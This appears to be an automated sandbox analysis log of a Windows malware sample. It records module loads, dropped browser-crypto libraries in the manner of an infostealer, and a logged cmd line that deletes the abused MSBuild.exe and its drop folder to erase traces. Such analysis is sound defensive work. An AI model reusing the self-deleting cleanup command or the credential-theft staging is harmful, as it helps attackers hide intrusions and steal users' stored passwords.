                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe" & rd /s /q "C:\ProgramData\AFCBAEBAEBFH" & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mozglue.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeStatic file information: File size 5039032 > 1048576
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x47ae00
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.2060089144.000000006D09D000.00000002.00000001.01000000.0000000C.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                    Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                    Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdb source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.2058676901.000000006CD5F000.00000002.00000001.01000000.0000000B.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                    Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.00000000045CB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.0000000004440000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1767557867.0000000005610000.00000004.08000000.00040000.00000000.sdmp, Protect544cd51a.dll.0.dr
                    Source: Binary string: System.ni.pdbRSDS source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.2060089144.000000006D09D000.00000002.00000001.01000000.0000000C.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                    Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x86.Release\corehost\cli\apphost\standalone\Release\apphost.pdbfffGCTL source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: C:\projects\polly\src\Polly.Net45\obj\Release\net45\Polly.pdb source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: System.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: System.Core.ni.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: System.pdbD source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                    Source: Binary string: C:\projects\polly\src\Polly.Net45\obj\Release\net45\Polly.pdbjz source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: mscorlib.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdbSHA256 source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x86.Release\corehost\cli\apphost\standalone\Release\apphost.pdb source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: mscorlib.ni.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: System.Core.pdb< source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: System.Core.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.2058676901.000000006CD5F000.00000002.00000001.01000000.0000000B.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                    Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.2054205361.00000000192D8000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2048308496.000000001336C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.1.dr
                    Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                    Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.00000000044FD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.0000000004372000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1767557867.00000000056CA000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WER74E4.tmp.dmp.4.dr
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeStatic PE information: 0xA24C332C [Fri Apr 14 01:53:48 2056 UTC]
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D01B6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,0_2_6D01B6C0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D06CC2B push ecx; ret 0_2_6D06CC3E
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D06D565 push ecx; ret 0_2_6D06D578
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_02EBA828 push eax; mov dword ptr [esp], ecx0_2_02EBA829
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_02EB46CC push esi; iretd 0_2_02EB46CD
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_054383EF push dword ptr [esp+ecx*2-75h]; ret 0_2_054383F3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004191D5 push ecx; ret 1_2_004191E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\AFCBAEBAEBFH\nss3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\AFCBAEBAEBFH\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeFile created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\AFCBAEBAEBFH\mozglue.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\AFCBAEBAEBFH\msvcp140.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\AFCBAEBAEBFH\softokn3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\AFCBAEBAEBFH\freebl3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\AFCBAEBAEBFH\nss3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\AFCBAEBAEBFH\vcruntime140.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\AFCBAEBAEBFH\mozglue.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\AFCBAEBAEBFH\msvcp140.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\AFCBAEBAEBFH\softokn3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\AFCBAEBAEBFH\freebl3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00417645
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
